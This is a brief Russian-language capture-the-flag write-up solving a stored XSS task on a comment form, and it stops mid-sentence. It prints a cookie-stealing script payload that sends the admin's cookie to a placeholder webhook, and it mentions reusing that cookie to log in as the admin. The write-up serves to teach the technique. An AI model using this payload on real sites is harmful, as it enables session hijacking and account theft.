Приветствую! Решим простую задачу со Stored XSS. Поехали! Итак, нам дают форму с отправкой комментария. Давайте попробуем ввести в форму Message спец. символы и посмотрим фильтруются ли они. Так мы поймём есть ли тут какая-то защита от XSS. Сделаем это следующим образом: Сохраняем комментарий. Далее смотрим исходный код и видим, что все символы сохранились в том же виде. Так мы убедились, что вероятнее всего уязвима форма с телом сообщения и что фильтрации там нет. Введём стандартный payload для проверки наличия XSS. XSS сработала! Теперь попробуем вытащить куки с сервера. Для этого используем следующий стандартный payload: <script>document.location='<WEBHOOK_URL>?c='+document.cookie;</script> Ждём около минуты, когда админ проверит комментарий и получаем кукисы! Эта наш флаг! Победа! При помощи расширения браузера EditThisCookie можно поменять свой куки на админский и зайти уже под его правами, но здесь этого делать нет нужды. Таск решён! В очередной раз убеждаемся в том, что XSS оч